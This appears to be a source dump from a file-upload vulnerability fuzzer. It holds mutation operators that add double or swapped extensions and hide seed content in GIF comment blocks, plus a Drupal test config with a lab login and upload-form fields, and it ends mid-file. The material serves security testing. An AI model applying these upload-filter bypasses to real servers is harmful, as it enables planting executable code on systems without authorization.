24 |       fp.write(output['content'])
25 |     """
26 |     if output['filename'] != None and len(output['filename']) > 0:
27 |       filename = output['filename']
28 |     else:
29 |       filename = utils.extract_filename(seed_file)
30 |     output['filename'] = filename + '_M2ZIP'
31 | 


--------------------------------------------------------------------------------
/configs/drupal-credential-nonmonitor.conf:
--------------------------------------------------------------------------------
 1 | [USER_CREDENTIAL]
 2 | 
 3 | ID = vuln_web 
 4 | PW = vu!nweb321
 5 | WebRootPath = /var/www/html/
 6 | WebHost = http://127.0.0.1
 7 | WebLoginIDName = name
 8 | WebLoginPWName = pass
 9 | WebLoginURL = http://127.0.0.1/drupal/user/login
10 | WebLoginPageURL = http://127.0.0.1/drupal/user/login 
11 | WebLoginCSRFName = form_build_id
12 | WebLoginAdditionalValue =  form_id=user_login_form;op=Log in
13 | WebLoginSuccessStr = Log out</a>
14 | WebUploadURL = http://127.0.0.1/drupal/node/add/article?element_parents=field_image/widget/0&ajax_form=1&_wrapper_format=drupal_ajax
15 | WebUploadPageURL = http://127.0.0.1/drupal/node/add/article
16 | WebUploadFormAttr = 
17 | WebUploadCustomHeader =
18 | WebUploadCSRFName = form_build_id;form_token
19 | WebUploadSuccessStr = %notin=Error#
20 | WebUploadAdditionalValue = changed=1542199556;title[0][value]=asdf;form_id=node_article_form;body[0][summary]=;body[0][value]=<p>asdf</p>;body[0][format]=basic_html;field_tags[target_id]= ;files[field_image_0]=%filebinary#;field_image[0][fids]=;field_image[0][display]=;revision_log[0][value]=;menu[title]=;menu[description]=;menu[menu_parent]=main:;menu[weight]=0;comment[0][status]=2;path[0][alias]=;uid[0][target_id]=vuln_web (1);created[0][value][date]=2018-11-14;created[0][value][time]=21:45:56;promote[value]=1;status[value]=1;_triggering_element_name=field_image_0_upload_button;_triggering_element_value=Upload;_drupal_ajax=1;ajax_page_state[theme]=seven;ajax_page_state[libraries]=big_pipe/big_pipe,ckeditor/drupal.ckeditor,ckeditor/drupal.ckeditor.plugins.drupalimagecaption,classy/base,classy/image-widget,classy/messages,comment/drupal.comment,contextual/drupal.contextual-links,contextual/drupal.contextual-toolbar,core/drupal.active-link,core/drupal.autocomplete,core/drupal.collapse,core/drupal.states,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,filter/drupal.filter,menu_ui/drupal.menu_ui,node/drupal.node,path/drupal.path,seven/global-styling,seven/node-form,shortcut/drupal.shortcut,text/drupal.text,toolbar/toolbar,toolbar/toolbar.escapeAdmin,tour/tour,user/drupal.user.icons;ajax_page_state[theme_token]=UtwM23XQvbwh_iar-YXD6V8wmQpA0LmATcZXD4U1EBU
21 | WebUploadedFileUrlPattern = http://127.0.0.1/drupal/sites/default/files/[0-9|-]{7}/.*?(?=(u0022))
22 | WebUploadFilesURL =
23 | WebUploadFilesParameter =
24 | 
25 | [DETECTOR_CONF]
26 | 
27 | MutationChainLimit = 99
28 | MonitorEnable = False
29 | MonitorHost = 127.0.0.1 
30 | MonitorPort = 
31 | 


--------------------------------------------------------------------------------
/mutation_op/m04_xht.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation4: Change Extensions to Mutation Resource File"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M12_HTML','M12_XHTML','M12_XHT','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M07','M10'],'xhtml':['M12_HTML','M12_XHTML','M12_XHT','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M06','M07','M08','M10'],'js':['M12_HTML','M12_XHTML','M12_XHT','M10','M07','M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX','M13']}#['M04_JPG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_PNG', 'M04_TXT', 'M07_PHP', 'M07_OTHER', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M4XHT'
19 |       output['fileext'] = 'xht'
20 | 


--------------------------------------------------------------------------------
/mutation_op/m02_gif.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import struct
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation2 : set seed in resource file as metadata"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M09','M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP'], 'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP','M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP','M04_ACE','M04_ARC','M04_ARJ','M04_BZ2','M04_DFXP','M04_EPUB','M04_GPX','M04_GZIP','M04_M4V','M04_MPA','M04_MPP','M04_NUMBERS','M04_ONETOC','M04_OXPS','M04_PAGES','M04_WP','M04_WRI','M04_XHT','M04_XLA','M04_XLW','M04_XPS','M04_ZIPX','M06','M07','M08','M09','M10']}#['M01_JPG', 'M01_PNG', 'M01_GIF', 'M01_ZIP', 'M01_TAR_GZ', 'M01_PDF', 'M02_PNG', 'M02_JPG', 'M02_ZIP', 'M02_PDF', 'M02_JSBMP', 'M02_JSGIF', 'M06', 'M07_OTHER', 'M08', 'M10'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |     if len(output['content'])<256:
14 |       commentBlock = [b'\x21\xFE',struct.pack('>B',len(output['content'])),output['content'],'\x00']
15 |     else:
16 |       commentBlock = [b'\x21\xFE',b'\xff']
17 |       offset = 0xff
18 |       commentBlock += [output['content'][:offset]]
19 |       while len(output['content'][offset:])>0:
20 |         semilen = ord(output['content'][offset])
21 |         commentBlock += [struct.pack('>B',semilen)]
22 |         pad = ""
23 |         if semilen > len(output['content'][offset+1:]):
24 |           pad += "\x0a"*(semilen-len(output['content'][offset+1:]))
25 |         commentBlock += [output['content'][offset+1:offset+1+semilen]+pad]
26 |         offset = offset+1+semilen-len(pad)
27 | 
28 |     with open('./resource/test.gif','rb') as fp:
29 |       data = fp.read()
30 | 
31 |     output['content'] = data[:0x30d]+b''.join(commentBlock)+data[0x30d:]
32 | 
33 |     #with open('new.gif','wb') as fp:
34 |     #  fp.write(output['content'])
35 | 
36 |     if output['filename'] != None and len(output['filename']) > 0:
37 |       filename = output['filename']
38 |     else:
39 |       filename = utils.extract_filename(seed_file)
40 |     output['filename'] = filename + '_M2GIF'
41 | 


--------------------------------------------------------------------------------
/mutation_op/m12_xht.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12XHT'
19 | 
20 |       output['fileext'] = 'xht.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_xla.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12XLA'
19 | 
20 |       output['fileext'] = 'xla.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_gzip.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12GZIP'
19 | 
20 |       output['fileext'] = 'gzip.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_m4v.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}# ['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12M4V'
19 | 
20 |       output['fileext'] = 'm4v.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m12_pages.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation12: Double extension"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 |   __exclusion_op__ = {'php':['M07', 'M10', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'js':['M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'], 'html':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX'],'xhtml':['M07', 'M12_ACE', 'M12_ARC', 'M12_ARJ', 'M12_BZ2', 'M12_DFXP', 'M12_EPUB', 'M12_GIF', 'M12_GPX', 'M12_GZIP', 'M12_JPG', 'M12_M4V', 'M12_MPA', 'M12_MPP', 'M12_NUMBERS', 'M12_ONETOC', 'M12_OXPS', 'M12_PAGES', 'M12_PDF', 'M12_PNG', 'M12_TAR_GZ', 'M12_TXT', 'M12_WP', 'M12_WRI', 'M12_XHT', 'M12_XLA', 'M12_XLW', 'M12_XPS', 'M12_ZIP', 'M12_HTML','M12_XHTML','M12_ZIPX']}#['M12_JPG',          'M12_TXT','M12_PNG','M12_PDF','M12_ZIP','M12_TAR_GZ', 'M10', 'M07_PHP', 'M07_OTHER', 'M04_JPG', 'M04_PNG', 'M04_GIF', 'M04_ZIP', 'M04_TAR_GZ', 'M04_PDF', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHAR', 'M04_PHT', 'M04_PHTML', 'M04_TXT'] # ([classname])when this op used for mutation,
 8 |                         # operations in this list can be used to extra mutation.
 9 |   __resource__ = {} # ({type:resource filename})
10 |   __seed_dependency__ = __exclusion_op__.keys()#["html","js","php"] # seed file dependency for operation
11 | 
12 |   def operation(self, output, seed_file, resource_file=None):
13 |       if output['filename'] != None and len(output['filename']) > 0:
14 |         filename = output['filename']
15 |       else:
16 |         filename = utils.extract_filename(seed_file)
17 | 
18 |       output['filename'] = filename + '_M12PAGES'
19 | 
20 |       output['fileext'] = 'pages.'+output['fileext']
21 | 


--------------------------------------------------------------------------------
/mutation_op/m06.py:
--------------------------------------------------------------------------------
 1 | from mutation_op import *
 2 | import utils
 3 | 
 4 | class mOP(MutationOP):
 5 |   __comment__ = "Mutation 6: Apply form EML"
 6 |   __mutate_type__ = "file"  # (file|request) ; type of target
 7 | 
 8 |   # XXX: Fill the exclusion operator and seed dependency
 9 |   __exclusion_op__ = {'html':['M01_GIF', 'M01_JPG', 'M01_PDF', 'M01_PNG', 'M01_TAR_GZ', 'M01_ZIP', 'M02_GIF', 'M02_JPG', 'M02_JSBMP', 'M02_JSGIF', 'M02_PDF', 'M02_PNG', 'M02_ZIP', 'M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 'M04_XPS', 'M04_ZIP', 'M04_ZIPX', 'M06' ,'M07', 'M08', 'M09', 'M10'], 'xhtml':['M04_ACE', 'M04_ARC', 'M04_ARJ', 'M04_BZ2', 'M04_DFXP', 'M04_EPUB', 'M04_GIF', 'M04_GPX', 'M04_GZIP', 'M04_JPG', 'M04_M4V', 'M04_MPA', 'M04_MPP', 'M04_NUMBERS', 'M04_ONETOC', 'M04_OXPS', 'M04_PAGES', 'M04_PDF', 'M04_PHAR', 'M04_PHP3', 'M04_PHP4', 'M04_PHP5', 'M04_PHP7', 'M04_PHTML', 'M04_PHT', 'M04_PNG', 'M04_TAR_GZ', 'M04_TXT', 'M04_WP', 'M04_WRI', 'M04_XHT', 'M04_XLA', 'M04_XLW', 